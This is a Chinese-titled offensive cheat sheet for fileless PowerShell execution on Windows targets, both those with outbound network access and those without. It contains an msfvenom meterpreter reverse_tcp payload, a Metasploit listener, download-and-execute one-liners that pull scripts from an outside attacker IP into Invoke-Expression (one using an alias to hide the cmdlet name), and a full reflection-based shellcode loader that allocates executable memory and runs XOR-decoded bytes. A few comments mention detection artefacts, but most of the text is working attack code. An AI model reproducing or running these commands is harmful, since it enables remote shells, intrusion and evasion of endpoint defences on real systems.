PowerShell 无文件执行

目标出网

# Attacker machine
# Generate the PowerShell script with msf. The psh-reflection output format wraps the
# payload as a byte array inside a reflection-based in-memory loader (presumably the
# same stub that appears in full at the bottom of this page — verify against the file
# msfvenom writes). LHOST/LPORT are the address the payload connects back to, so they
# must match the handler started below.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 --arch x64 --platform windows -f psh-reflection -o test.ps1

# Serve the generated script over HTTP with Python's built-in server
# (SimpleHTTPServer is the Python 2 module name; its default port, 8000, is the one
# used in the download URLs in the victim-side commands below). It serves the current
# working directory, so run it from the directory that holds the .ps1 file.
python -m SimpleHTTPServer

# msf listener — these four lines are msfconsole commands, not shell. The handler
# waits on lhost for the reverse connection made by the payload once it runs.
use multi/handler
set payload windows/x64/shell/reverse_tcp
set lhost 170.170.64.17
run

# Executed on the victim machine
# Fetch the script over HTTP and pass the returned text straight to Invoke-Expression:
# it is executed from the string in memory, so no script file is written to disk.
# The only artefacts are the outbound HTTP request, the PowerShell process itself and
# whatever script-content telemetry the host records for the executed text.
powershell Invoke-Expression(New-Object Net.WebClient).DownloadString('http://170.170.64.17:8000/calc.ps1')

# Same download-and-execute flow; the only difference is that Invoke-Expression is
# reached through a freshly defined alias, so the literal cmdlet name no longer appears
# on the process command line. NOTE(review): the aliased cmdlet still executes the
# downloaded text, so controls that inspect executed script content rather than the
# command line are presumably unaffected by this — confirm against your logging setup.
powershell set-alias -name xxx -value Invoke-Expression;xxx(New-Object Net.WebClient).DownloadString('http://170.170.64.17:8000/test.ps1')

目标不出网

# readbytes.ps1
# Reads every byte of the file named by the first argument and writes them out as a
# single comma-separated line of decimal values with a trailing comma, e.g. the bytes
# of "calc" become "99,97,108,99,".
# Note: [System.IO.File] resolves a relative path against the process working
# directory, not the PowerShell $PWD — pass a full path if the two differ.

[Byte[]]$bytes = [System.IO.File]::ReadAllBytes($args[0])

# Render each byte as "<decimal>," and concatenate the pieces; an empty file yields "".
$s = ($bytes | ForEach-Object { "$_," }) -join ''

$s

# Read the byte array out of the .bin file and substitute it for the byte array in
# the text below. The script prints one comma-separated line of decimal values
# (trailing comma included) to stdout; capture or copy that output.
readbytes.ps1 .\payload.bin



# cmd.exe one-liner (`^|` is the cmd escape for `|`): the whole script block is
# converted to a string and handed to iex, so nothing is written to disk. What the
# body does, as written: resolves VirtualAlloc by reflecting into System.dll's
# Microsoft.Win32.UnsafeNativeMethods (GetModuleHandle/GetProcAddress), builds
# delegate types at runtime via Reflection.Emit, XORs the embedded byte array with 26
# (the placeholder here is 99,97,108,99 — ASCII "calc" — which is what the readbytes
# output above replaces), allocates a buffer with protection 0x40 (PAGE_EXECUTE_READWRITE)
# and 0x3000 (MEM_COMMIT|MEM_RESERVE), copies the decoded bytes in and calls into it.
# The [IntPtr]::size check means it only runs in a 64-bit PowerShell process.
# NOTE(review): from a detection standpoint the observable artefacts are an RWX
# allocation and the executed script content (the `iex $string` at the end); the
# command line alone shows only the template, not the decoded bytes.
powershell $string={Set-StrictMode -Version 2;function func_get_proc_address {Param ($var_module, $var_procedure);$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() ^| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods');$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'));return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))};function func_get_delegate_type {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $var_return_type = [Void]);$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed');$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed');return $var_type_builder.CreateType()};If ([IntPtr]::size -eq 8) {[Byte[]]$var_code =99,97,108,99;for ($x = 0; $x -lt $var_code.Count; $x++) {$var_code[$x] = $var_code[$x] -bxor 26;};$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])));$var_buffer = 
$var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40);[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length);$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])));$var_runme.Invoke([IntPtr]::Zero)}}.ToString();iex $string